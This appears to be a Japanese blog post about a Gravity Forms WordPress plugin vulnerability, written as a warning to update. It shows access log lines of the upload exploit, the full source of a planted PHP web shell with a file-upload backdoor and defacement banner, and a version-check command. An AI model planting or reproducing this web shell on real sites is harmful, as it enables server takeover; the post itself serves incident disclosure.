Gravityforms-Vulnerability

wordpressのプラグイン gravityformsバージョン1.8.19以下に脆弱性が見つかりました。
脆弱性のあるバージョンをお使いの方は至急、アップデートしましょう。

アクセスログではこんな感じで出力されます。

1
2
3
http://example.com/index.php?gf_page=upload
http://example.com/wp-content/uploads/_input_3_.php.
http://example.com/wp-content/indonesia.php ## これが不正ファイル

indonesia.php ファイルの中身はこんな感じです。

1
2
3
4
5
$ more indonesia.php
<?php if(isset($_GET["neouk"])){echo"<font color=#FFFFFF>[uname]".php_uname()."[/uname]";echo"<br><font color=#FFFFFF>[dir]".getcwd()."[/dir]";echo"<form method=post enctype=multipart/form-data>";echo"<input type=file name=f><i
nput name=v type=submit id=v value=up><br>";if($_POST["v"]==up){if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){echo"<b>berhasil</b>-->".$_FILES["f"]["name"];}else{echo"<b>gagal";}}}?><title>Hacked by NG689Skw</title><
center><div id=q>Gantengers Crew<br><font size=2>SultanHaikal - d3b~X - Brian Kamikaze - Coupdegrace - Mdn_newbie - NG689Skw<br>ng689skw[at]yahoo[dot]com
<style>body{overflow:hidden;background-color:black}#q{font:40px impact;color:white;position:absolute;left:0;right:0;top:43%}

表示はこんなかんじです。

[NG689Skw.png]

バージョンの確認方法は以下の通り

1
2
$ find . -name gravityforms.php  | xargs grep Version:
Version: 1.8.8

参考にしたサイト